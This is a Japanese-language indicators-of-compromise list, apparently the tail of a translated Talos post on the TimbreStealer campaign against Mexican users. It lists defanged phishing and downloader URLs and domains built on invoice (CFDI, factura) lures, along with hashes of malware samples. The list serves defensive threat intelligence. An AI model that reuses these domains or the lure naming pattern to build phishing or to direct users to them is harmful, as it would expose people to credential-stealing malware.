hxxps://comprobante27[.]serragrandreunion[.]com/facdigital/bca7513c9e00b9

hxxps://comprobante27[.]servicioslocomer[.]online/factura/2003b3fe7ae6f4

hxxps://comprobante45[.]altavista100[.]com/cfdi/d13011c95ba2b0

hxxps://comprobante51[.]meinastrohoroskop[.]com/facdigital/121c0388193ba5

hxxps://comprobante63[.]serragrandreunion[.]com/facdigital/3c45bca741d4f6

hxxps://comprobante68[.]portafoliocfdi[.]com/seg_factura/58c0146a753186

hxxps://comprobante70[.]miramantolama[.]com/timbreDigital/18665ae0a7b9e1

hxxps://comprobante75[.]meinastrohoroskop[.]com/timbreDigital/bfa30824f1120b

hxxps://comprobante80[.]serragrandreunion[.]com/timbreDigital/bf4a8735ed3953

hxxps://comprobante91[.]servicioslocomer[.]online/timbreDigital/adb6403b186182

hxxps://comprobante93[.]venagard[.]com/cfdi/57880f98ef2b70

hxxps://cumplimiento19[.]altavista100[.]com/timbreDigital/dd141e683a3056

hxxps://cumplimiento35[.]solucionegos[.]top/factura/bde64155cabbe5

hxxps://cumplimiento39[.]meinastrohoroskop[.]com/seg_factura/d4e9d7823adff2

hxxps://cumplimiento43[.]commerxion[.]buzz/facdigital/1ac5acb1a5525b

hxxps://cumplimiento47[.]solucionegos[.]top/seg_factura/7fa6018dc9b68f

hxxps://cumplimiento48[.]callarlene[.]net/seg_factura/c19a0dd4addc3e

hxxps://cumplimiento56[.]timbradoelectronico[.]com/facdigital/dd37434dcde7ad

hxxps://cumplimiento72[.]serragrandreunion[.]com/seg_factura/92cd2425a6c150

hxxps://cumplimiento81[.]paulfenelon[.]com/cfdi/20149ee8e1d3b2

hxxps://cumplimiento91[.]miramantolama[.]com/seg_factura/e907d32bf0d056

hxxps://cumplimiento94[.]meinastrohoroskop[.]com/cfdi/bd56529f9d1411

hxxps://cumplimiento98[.]serragrandreunion[.]com/factura/3f209bc16cbb9a

hxxps://factura10[.]miramantolama[.]com/factura/039d9cbaeec9b5

hxxps://factura20[.]facturascorporativas[.]com/seg_factura/9622cf8c695873

hxxps://factura20[.]solunline[.]top/cfdi/6401eac16211b2

hxxps://factura34[.]changjiangys[.]net/facdigital/52490c838bd94f

hxxps://factura4[.]servicioslocomer[.]online/cfdi/f2369d09a54ad9

hxxps://factura40[.]miramantolama[.]com/cfdi/9318466130e6af

hxxps://factura44[.]servicioslocales[.]online/cfdi/25e8a6f5393e1f

hxxps://factura46[.]facturasfiel[.]com/factura/021bd5fa122bb2

hxxps://factura49[.]marcialledo[.]com/factura/fc2cc5bf671dd0

hxxps://factura50[.]callarlene[.]net/cfdi/867d138f26fb23

hxxps://factura59[.]altavista100[.]com/seg_factura/0179ae05a51830

hxxps://factura7[.]taoshome4sale[.]com/factura/eebf49f810a0a6

hxxps://factura71[.]servicioslomex[.]online/timbreDigital/5de7db415c7e8e

hxxps://factura72[.]serragrandreunion[.]com/seg_factura/728423dceff50c

hxxps://factura73[.]mariageorgina[.]com/cfdi/71deea8cdbcb10

hxxps://factura81[.]altavista100[.]com/factura/8421cd5cb1c8e4

hxxps://factura90[.]changjiangys[.]net/timbreDigital/029a6531330379

hxxps://factura91[.]servicioslocomer[.]online/timbreDigital/2952b54a9542f1

hxxps://folio24[.]serragrandreunion[.]com/seg_factura/548b685f48dd30

hxxps://folio24[.]spacefordailyrituals[.]com/facdigital/55ae12184283dc

hxxps://folio47[.]marcialledo[.]com/seg_factura/e6bab6d032e282

hxxps://folio53[.]mariageorgina[.]com/seg_factura/ca2fd939c046fa

hxxps://folio60[.]callarlene[.]net/seg_factura/367b377baf47e5

hxxps://folio75[.]taoshome4sale[.]com/cfdi/7482bf3f2690af

hxxps://folio75[.]venagard[.]com/cfdi/7718efe0fd3952

hxxps://folio76[.]miramantolama[.]com/cfdi/a74b25b75c7182

hxxps://folio83[.]altavista100[.]com/factura/20f00b7d569c85

hxxps://folio89[.]changjiangys[.]net/factura/b645784e80f71a

hxxps://folio90[.]servicioslocomer[.]online/facdigital/d1950dc8f24757

hxxps://folio99[.]solunline[.]top/facdigital/b7928d4e0eade5

hxxps://pdf21[.]changjiangys[.]net/cfdi/2f99e7adf61c47

hxxps://pdf33[.]venagard[.]com/timbreDigital/91849e7d9fe4ad

hxxps://pdf34[.]solucionpiens[.]top/seg_factura/2dfed5bc7fcbf6

hxxps://pdf39[.]facturasonlinemx[.]com/seg_factura/66971f3669145a

hxxps://pdf49[.]marcialledo[.]com/factura/729c18972d690c

hxxps://pdf50[.]changjiangys[.]net/factura/cdb5ed3876c4bf

hxxps://pdf57[.]visual8298[.]top/factura/5239e15a8324ab

hxxps://pdf59[.]venagard[.]com/cfdi/5791bf23c6929e

hxxps://pdf63[.]paulfenelon[.]com/timbreDigital/3ae250718da0ca

hxxps://pdf65[.]verificatutramite[.]com/facdigital/e1ec8098e50a0b

hxxps://pdf70[.]mariageorgina[.]com/cfdi/fab1264f158f44

hxxps://pdf81[.]photographyride[.]com/seg_factura/4eb3832fe6d1bd

hxxps://pdf85[.]miramantolama[.]com/factura/74f871b7ca1977

hxxps://pdf93[.]venagard[.]com/factura/f24a53f8932b3f

hxxps://pdf98[.]solunline[.]top/timbreDigital/f57e558c31a86e

hxxps://portal27[.]marcialledo[.]com/timbreDigital/f8a5f05b3c1651

hxxps://portal34[.]solunline[.]top/cfdi/a068bb0da7eea1

hxxps://portal48[.]solucionpiens[.]top/timbreDigital/15ec5fc2aaf26a

hxxps://portal50[.]solucionegos[.]top/factura/8d4c6f7e2a4c7f

hxxps://portal55[.]solucionegos[.]top/seg_factura/f5f59070b20629

hxxps://portal63[.]paulfenelon[.]com/seg_factura/77907fa76c7c59

hxxps://portal70[.]solunline[.]top/timbreDigital/92b380d91a67a0

hxxps://portal80[.]changjiangys[.]net/cfdi/2224782a3b7f1d

hxxps://portal86[.]serragrandreunion[.]com/facdigital/68da4282591283

hxxps://portal90[.]meinastrohoroskop[.]com/factura/64f247c6238c38

hxxps://portal92[.]solucionpiens[.]top/timbreDigital/34893de446d532

hxxps://suscripcion0[.]venagard[.]com/timbreDigital/5c86c63ca1ffda

hxxps://suscripcion10[.]solunline[.]xyz/facdigital/ebe0cb51090e51

hxxps://suscripcion24[.]facturasonlinemx[.]com/factura/d6a6f8208ed508

hxxps://suscripcion24[.]venagard[.]com/timbreDigital/50c6f1fad17f5e

hxxps://suscripcion32[.]servicioslocomer[.]online/facdigital/22ccd8880c217e

hxxps://suscripcion38[.]eagleservice[.]buzz/cfdi/6dadfe1a18cffc

hxxps://suscripcion38[.]mariageorgina[.]com/factura/9c787623800b5e

hxxps://suscripcion57[.]changjiangys[.]net/factura/22ad73593f724a

hxxps://suscripcion65[.]g1ooseradas[.]buzz/factura/9f03d9ef3d73b5

hxxps://suscripcion84[.]taoshome4sale[.]com/cfdi/e4af3e6e22a8a6

hxxps://suscripcion95[.]servicioslomex[.]online/cfdi/0faa4a21fff2bb

hxxps://timbrado0[.]meinastrohoroskop[.]com/cfdi/515c9b9087c737

hxxps://timbrado11[.]verificatutramite[.]com/facdigital/f7640878ebc0f9

hxxps://timbrado16[.]taoshome4sale[.]com/timbreDigital/259029c9d7f330

hxxps://timbrado17[.]marcialledo[.]com/factura/2ea580ee99d5f1

hxxps://timbrado17[.]mariageorgina[.]com/seg_factura/95a6c2c0e004d8

hxxps://timbrado2[.]serviciosna[.]top/facdigital/c5cb33d68be323

hxxps://timbrado2[.]solucionegos[.]top/seg_factura/7c867709e85c67

hxxps://timbrado33[.]meinastrohoroskop[.]com/timbreDigital/aaf2cc575db42c

hxxps://timbrado42[.]mariageorgina[.]com/facdigital/f0f82ab0c87b32

hxxps://timbrado54[.]changjiangys[.]net/cfdi/04e4e38338d82a

hxxps://timbrado6[.]meinastrohoroskop[.]com/cfdi/5290b37e80850a

hxxps://timbrado73[.]mariageorgina[.]com/timbreDigital/ff862f9245e8b6

hxxps://timbrado74[.]callarlene[.]net/timbreDigital/eb52e334a2c0b3

hxxps://timbrado74[.]mexicofacturacion[.]com/factura/14fcb6e3eaf351

hxxps://timbrado80[.]paulfenelon[.]com/timbreDigital/684bc3f7d7e7f9

hxxps://timbrado84[.]miramantolama[.]com/cfdi/18864dcecc9e9c

hxxps://timbrado90[.]porcesososo[.]online/factura/cde31eb6fcac1d

hxxps://timbrado96[.]paulfenelon[.]com/facdigital/ef18828525a8fb

hxxps://validacion22[.]hb56[.]cc/seg_factura/8f845f6ba70820

hxxps://trilivok[.]com/2ysz0gghg/cbt0mer/it.php?f=2&w=Windows%2010

hxxps://trilivok[.]com/3s9p2w9yy/bvhcc5x/it.php?f=9&w=Windows%2010

hxxps://chidoriland[.]com/1r49ucc73/hs4q07q/it.php?f=2&w=Windows%2010

hxxps://manderlyx[.]com/cruto/it.php?f=2&w=Windows%2010

hxxps://bailandolambada[.]com/5iplivg7q/gn4md5c/it.php?f=2&w=Windows%2010

ドメイン

trilivok[.]com

chidoriland[.]com

manderlyx[.]com

bailandolambada[.]com

0[.]solucionegos[.]top

auditoria38[.]meinastrohoroskop[.]com

auditoria42[.]altavista100[.]com

auditoria67[.]mariageorgina[.]com

auditoria7[.]miramantolama[.]com

auditoria82[.]taoshome4sale[.]com

auditoria84[.]meinastrohoroskop[.]com

auditoria88[.]mariageorgina[.]com

auditoria89[.]venagard[.]com

auditoria92[.]venagard[.]com

auditoria93[.]serragrandreunion[.]com

comprobante14[.]miramantolama[.]com

comprobante2[.]marcialledo[.]com

comprobante27[.]mariageorgina[.]com

comprobante27[.]serragrandreunion[.]com

comprobante27[.]servicioslocomer[.]online

comprobante45[.]altavista100[.]com

comprobante51[.]meinastrohoroskop[.]com

comprobante63[.]serragrandreunion[.]com

comprobante68[.]portafoliocfdi[.]com

comprobante70[.]miramantolama[.]com

comprobante75[.]meinastrohoroskop[.]com

comprobante80[.]serragrandreunion[.]com

comprobante91[.]servicioslocomer[.]online

comprobante93[.]venagard[.]com

cumplimiento19[.]altavista100[.]com

cumplimiento35[.]solucionegos[.]top

cumplimiento39[.]meinastrohoroskop[.]com

cumplimiento43[.]commerxion[.]buzz

cumplimiento47[.]solucionegos[.]top

cumplimiento48[.]callarlene[.]net

cumplimiento56[.]timbradoelectronico[.]com

cumplimiento72[.]serragrandreunion[.]com

cumplimiento81[.]paulfenelon[.]com

cumplimiento91[.]miramantolama[.]com

cumplimiento94[.]meinastrohoroskop[.]com

cumplimiento98[.]serragrandreunion[.]com

factura10[.]miramantolama[.]com

factura20[.]facturascorporativas[.]com

factura20[.]solunline[.]top

factura34[.]changjiangys[.]net

factura4[.]servicioslocomer[.]online

factura40[.]miramantolama[.]com

factura44[.]servicioslocales[.]online

factura46[.]facturasfiel[.]com

factura49[.]marcialledo[.]com

factura50[.]callarlene[.]net

factura59[.]altavista100[.]com

factura7[.]taoshome4sale[.]com

factura71[.]servicioslomex[.]online

factura72[.]serragrandreunion[.]com

factura73[.]mariageorgina[.]com

factura81[.]altavista100[.]com

factura90[.]changjiangys[.]net

factura91[.]servicioslocomer[.]online

folio24[.]serragrandreunion[.]com

folio24[.]spacefordailyrituals[.]com

folio47[.]marcialledo[.]com

folio53[.]mariageorgina[.]com

folio60[.]callarlene[.]net

folio75[.]taoshome4sale[.]com

folio75[.]venagard[.]com

folio76[.]miramantolama[.]com

folio83[.]altavista100[.]com

folio89[.]changjiangys[.]net

folio90[.]servicioslocomer[.]online

folio99[.]solunline[.]top

pdf21[.]changjiangys[.]net

pdf33[.]venagard[.]com

pdf34[.]solucionpiens[.]top

pdf39[.]facturasonlinemx[.]com

pdf43[.]marcialledo[.]com

pdf49[.]marcialledo[.]com

pdf50[.]changjiangys[.]net

pdf57[.]visual8298[.]top

pdf59[.]venagard[.]com

pdf63[.]paulfenelon[.]com

pdf65[.]verificatutramite[.]com

pdf70[.]mariageorgina[.]com

pdf81[.]photographyride[.]com

pdf85[.]miramantolama[.]com

pdf93[.]venagard[.]com

pdf98[.]solunline[.]top

portal27[.]marcialledo[.]com

portal34[.]solunline[.]top

portal48[.]solucionpiens[.]top

portal50[.]solucionegos[.]top

portal55[.]solucionegos[.]top

portal63[.]paulfenelon[.]com

portal70[.]solunline[.]top

portal80[.]changjiangys[.]net

portal86[.]serragrandreunion[.]com

portal90[.]meinastrohoroskop[.]com

portal92[.]solucionpiens[.]top

suscripcion0[.]venagard[.]com

suscripcion10[.]solunline[.]xyz

suscripcion24[.]facturasonlinemx[.]com

suscripcion24[.]venagard[.]com

suscripcion32[.]servicioslocomer[.]online

suscripcion38[.]eagleservice[.]buzz

suscripcion38[.]mariageorgina[.]com

suscripcion57[.]changjiangys[.]net

suscripcion65[.]g1ooseradas[.]buzz

suscripcion84[.]taoshome4sale[.]com

suscripcion95[.]servicioslomex[.]online

timbrado0[.]meinastrohoroskop[.]com

timbrado11[.]verificatutramite[.]com

timbrado16[.]taoshome4sale[.]com

timbrado17[.]marcialledo[.]com

timbrado17[.]mariageorgina[.]com

timbrado2[.]serviciosna[.]top

timbrado2[.]solucionegos[.]top

timbrado33[.]meinastrohoroskop[.]com

timbrado42[.]mariageorgina[.]com

timbrado54[.]changjiangys[.]net

timbrado6[.]meinastrohoroskop[.]com

timbrado73[.]mariageorgina[.]com

timbrado74[.]callarlene[.]net

timbrado74[.]mexicofacturacion[.]com

timbrado80[.]paulfenelon[.]com

timbrado84[.]miramantolama[.]com

timbrado90[.]porcesososo[.]online

timbrado96[.]paulfenelon[.]com

validacion22[.]hb56[.]cc

JavaScript ファイル

600d085638335542de1c06a012ec9d4c56ffe0373a5f61667158fc63894dde9f  (ダウンローダー)

883674fa4c562f04685a2b733747e4070fe927e1db1443f9073f31dd0cb5e215 (地域の確認とリダイレクト)

.URL ファイル

b1b85c821a7f3b5753becbbfa19d2e80e7dcbd5290d6d831fb07e91a21bdeaa7  CFDI_930209.zip

e04cee863791c26a275e0c06620ea7403c736f8cafbdda3417f854ae5d81a49f  FACTURA_560208.zip

aa187a53e55396238e97638032424d68ba2402259f2b308c9911777712b526af  FAC_560208_ATR890126GK2.url_

66af21ef63234c092441ec33351df0f829f08a2f48151557eb7a084c6275b791  FAC_930209_FME140910KI4.url_

埋め込まれたバイナリ

b3f4b207ee83b748f3ae83b90d1536f9c5321a84d9064dc9745683a93e5ec405  Cecujujajofubo475.dll_

e87325f4347f66b21b19cfb21c51fbf99ead6b63e1796fcb57cd2260bd720929  blob.dll_

103d3e03ce4295737ef9b2b9dfef425d93238a09b1eb738ac0e05da0c6c50028  blob.dll_

a579bd30e9ee7984489af95cffb2e8e6877873fd881aa18d7f5a2177d76f7bf2  blob.dll

b01e917dd14c780cb52cafcd14e4dd499c33822c7776d084d29cf5e0bb0bddb6  blob.dll_

795c0b82b37d339ea27014d73ad8f2d28c5066a7ceb6a2aa0d74188df9c311c9  blob.dll_

07521bd6acf725b8a33d1d91fd0cc7830d2cff66abdb24616c2076b63d3f36a8  blob.dll_

71ce48c89b22e99356c464c1541e2d7b9419a2c8fe8f6058914fc58703ba244f  blob.dll_

ba7bc4cff098f49d39e16c224e001bd40a5d08048aeec531f771a54ee4a5ecef  blob.dll_

ドロッパーバイナリ

010b48762a033f91b32e315ebcefb8423d2b20019516fa8f2f3d54d57d221bdb

024f3c591d44499afb8f477865c557fc15164ab0f35594e0cfdfa76245459762

03cd17df83a7bdf459f16677560e69143d1788ce1fc7927200a09f82859d90ea

075910c802f755d3178a8f1f14ee4cd7924fd4463c7491277bdf2681b16e593c

12bff33da7d9807252bb461d65828154b9b5b1dca505e8173893e3d410d40dd0

1aaa4fb29a88c83495de80893cd2476484af561bb29e8cdfc73ce38f6cd61a84

23b9e4103141d6a898773b1342269334e569bcf576cdcb4a905f24e26320cdab

27c1e41fde9bc0d5027a48ccada1af8c9c8f59937bf5f77edd21e49bd28f29a2

2a225784289f31adbaa8be0b8770495fa8950fce2b7352a0c7a566fc79067547

2a38b75e88f91f9cd28ef478e82c3b44f50e57cb958ba63e58f134d8bd368812

2a3f869e9e78b4d7945a60ceec27586c07bc8b0770be64463358fffe3b6b7395

2e04c36b7ddd6939b7bef258bfeba6f91a5c37a43389dd6d9a88eff5863df5ed

43e99539e4b966dde2f9de8dc1ffb4a22bc560e54c01de9aef6b15fac1412714

46226d4fb7ffe15ba8167e3724f991c543731672e19ef40bb43fddc6df648d0a

46cc07a9287da26e238a74734d87e0aae984f4648a80a26547afa0de8c850afb

51be3a3b4ebd15c305c0f9b57388c449f88f0d6d2d46a0a838f046f0fd21b78f

55b0247b9b574978a4c9abd19c3bcc04ea78598398b9f8aeb35bd51cbd877576

56612bb0ab00cbb7af24326b027a55ff25852ddab1f1c8e24471b7ce97003505

5831f4f8ce715d4a021284e68af1b6d8040a2543484ac84b326eea20c543552e

58562e49c1612f08e56e7d7b3ca6cd78285948018b2998e45bd425b4c79ce1f4

62495620b0d65d94bc3d68dec00ffbe607eacd20ab43dc4471170aa292cc9b1a

682546addb38a938982f0f715b27b4ba5cda4621e63f872f19110d174851c4e9

69019b7b64deb5cc91a58b6a3c5e6b1b6d6665bd40be1381a70690ba2b305790

6bf082f001f914824a6b33f9bdd56d562c081097692221fb887035e80926d583

7923d409959acffab49dda63c7c9c15e1bdd2b5c16f7fcfe8ef3e3108e08df87

7ac22989021082b9a377dcc582812693ce0733e973686b607e8fc2b52dcf181d

8420d77ba61925b03a1ad6c900a528ecacbb2c816b3e6bc62def40fc14e03b78

850dd47a0fb5e8b2b4358bf3aa1abd7ebaae577b6fc4b6b4e3d7533313c845b8

96363b2b9e4ed8044cb90b6619842ba8897b4392f9025cbfdccfda1ea7a14a58

97157c8bbeb8769770c4cb2201638d9ad0103ba2fdfed9bdbd03c53bd7a5fcb9

a103b0c604ef32e7aabb16c2a7917fd123c41486d8e0a4f43dcf6c48d76de425

a82fb82f3aa2f6123d2c0fb954ae558ac6e8862ef756b12136fbe8d533b30573

a92934c014a7859bd122717f4c87f6bd31896cb87d28c9fac1a6af57ff8110f6

ab2a2465fccd7294580c11492c29a943c54415e0c606f41e08ce86d69e254ee4

ababe815e11b762089180e5fb0b1eaffa6a035d630d7aaf1d8060bd5d9a87ea5

b04a0a4a1520c905007a5d370ed2b6c7cb42253f4722cc55a9e475ae9ece1de7

c29b9f79b0a34948bde1dfca3acecca6965795917c7d3444fcacba12f583fb98

c99237a5777a2e8fa7da33460a5b477d155cc26bc2e297a8563516a708323ead

ca652fc3a664a772dbf615abfe5df99d9c35f6a869043cf75736e6492fbd4bea

b5a272acd842154b2069b60aab52568bbfde60e59717190c71e787e336598912

5efa99b3cb17bec76fec2724bcfcc6423d0231bba9cf9c1aed63005e4c3c2875

ce135a7e0410314126cacb2a2dba3d6d4c17d6ee672c57c097816d64eb427735

d3ff98b196717e66213ccf009cbeed32250da0e2c2748d44f4ee8fb4f704407c

35b7dd775db142699228d3e64ee8e9a02c6d91bb49f7c2faf367df8ba2186fd6

e65e25aee5947747f471407a6cce9137695e4fee820f990883b117726195988c

e8ed09b016ea62058404c482edf988f14a87c790d5c9bd3d2e03885b818ef822

febf9c5ede3964fdb3b53307a3d5ef7b0e222705a3bb39bef58e28aaba5eed28

ff3769c95b8a5cdcba750fda5bbbb92ef79177e3de6dc1143186e893e68d45a4

 

本稿は 2024 年 02 月 27 日に Talos Grouppopup_icon のブログに投稿された「TimbreStealer campaign targets Mexican users with financial lurespopup_icon」の抄訳です。

 

コメントを書く